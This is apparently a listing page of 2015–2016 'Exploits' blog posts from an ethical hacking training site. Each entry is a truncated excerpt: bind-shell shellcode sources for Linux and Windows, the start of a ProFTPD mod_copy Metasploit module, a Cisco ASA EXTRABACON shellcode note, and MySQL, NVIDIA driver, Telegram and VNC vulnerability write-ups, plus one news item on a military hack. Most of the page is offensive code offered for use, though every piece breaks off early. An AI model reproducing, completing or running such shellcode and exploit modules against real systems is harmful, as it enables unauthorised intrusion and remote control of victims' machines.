Exploits


MySQL / MariaDB / PerconaDB – ‘root’ Privilege Escalation Vulnerability – Metasploit Code

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Dawid
I. VULNERABILITY
————————-
 
MariaDB / MySQL / PerconaDB - Root Privilege Escalation
 
MySQL 
    <= 5.5.51
    <= 5.6.32
    <= 5.7.14
 
MariaDB
    All current
 
Percona Server
    < 5.5.51-38.2
    < 5.6.32-78-1
    < 5.7.14-8
 
Percona XtraDB Cluster
    < 5.6.32-25.17
    < 5.7.14-26.17
    < 5.5.41-37.0
 
 
II. BACKGROUND
————————-
 
MySQL:
 
“MySQL is the world’s most popular open source database.
Whether you are a fast growing web property, technology ISV or large
enterprise, MySQL […]

By |November 3rd, 2016|Exploits|

NVIDIA Driver – NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Priv


The NvStreamKms.sys driver calls PsSetCreateProcessNotifyRoutineEx to set up a
process creation notification routine.
 
In this particular routine,
 
if ( cur->image_names_count > 0 ) {
  // info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
  image_filename = info_->ImageFileName;
  buf = image_filename->Buffer;
  if ( buf )
  {
    if ( !v5 )
    {
      i = 0i64;
      num_chars = image_filename->Length […]

By |November 3rd, 2016|Exploits|

Linux/x86-64 – Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode


Credits: CripSlick
#include <stdio.h>
#include <string.h>
 

 
//|=========================================================================================
//|=============== CripSlick's Persistent Bind-Shell with Port-Range + password ============
//|
//|
//| CODE 3 Has everything to offer that CODE2 has and more. CODE2 has everything to offer
//| that CODE1 has and more. CODE1 is still great due to being a very short bind shell.
//| […]

By |October 31st, 2016|Exploits|

Linux/x86 – NetCat Bind Shell with Port using C Programming


Credits: CripSlick
#include <stdio.h>
#include <string.h>
#include <unistd.h> //| needed for C "fork"
#include <stdlib.h> //| needed for C "system"
 
//|=====================================================================================================
//|================================ CripSlick's Short NetCat Bind Shell ================================
//|
//|
//| Why use CripSlick's NetCat Bind Shell?
//| Because it is short and that is about the only reason. If you can spare some bytes, I […]

By |October 31st, 2016|Exploits|

Windows/x86 – Password Protected TCP Bind Shell


Credits: Brother Roziul Hasan Khan
/*
    # Title : Windows x86 password protected bind shell tcp shellcode
    # size : 637 bytes
    # Tested On : Windows 7 ultimate x86 x64
*/
/*
Disassembly of section .text:
 
00000000 <_start>:
   0:   99                      cltd  
   1:   64 8b 42 30             mov    %fs:0x30(%edx),%eax
   5:   8b 40 0c                mov    0xc(%eax),%eax
   8:   8b […]

By |October 29th, 2016|Exploits|

Cisco ASA – Authentication Bypass ‘EXTRABACON’ (Improved Shellcode)


Credits: RiskSense
Cisco ASA Authentication Bypass (EXTRABACON) Better Shellcode (69 bytes);

 Description:
            This is not the same shellcode as the Equation Group version,
            but accomplishes the same task of disabling the auth functions
            […]

By |October 29th, 2016|Exploits|

Telegram Web 0.5.5 Username Bypass Vulnerability – Easy Mode


Credits: Malware4u
#########################################################################
# Exploit Title: Telegram Web Empty Username Bypass
# version : Telegram Web 0.5.5
# Tested on: Windows 10
##########################################################################
Description:
Telegram filters null bytes in the username input, but on the web version of Telegram you can bypass this
filter with "NOP"s (0x90), because the filter is not implemented on the
server's code side.
##########################################################################
Step 1:
First […]

By |October 29th, 2016|Exploits|

German Military Hacked Afghan Mobile Operator to Discover Hostage’s Whereabouts


A special cyber unit of the Bundeswehr (German Armed Forces) carried out Germany's first-ever offensive cyber operation by hacking into the network of an Afghan mobile operator to track the location of a group of kidnappers who had taken a young German woman hostage.

The woman, […]

By |September 25th, 2016|Exploits|

VNC Keyboard Remote Code Execution Exploit

Advanced Ethical Hacking Institute in Pune

Full title: VNC Keyboard Remote Code Execution Exploit

Date added: 13-07-2015

Category: remote exploits

Platform: multiple

Security risk: Critical

Description:
This Metasploit module exploits VNC servers by sending virtual keyboard keys and executing a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager payload is typed and executed. On Unix/Linux systems an xterm terminal is opened […]

By |July 14th, 2015|Exploits|

Exploit: ProFTPD 1.3.5 Mod_Copy Command Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProFTPD 1.3.5 Mod_Copy Command Execution',
      'Description'    => %q{
          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
          Any unauthenticated client can leverage these commands to copy files from any
          part of the […]

By |June 23rd, 2015|Exploits|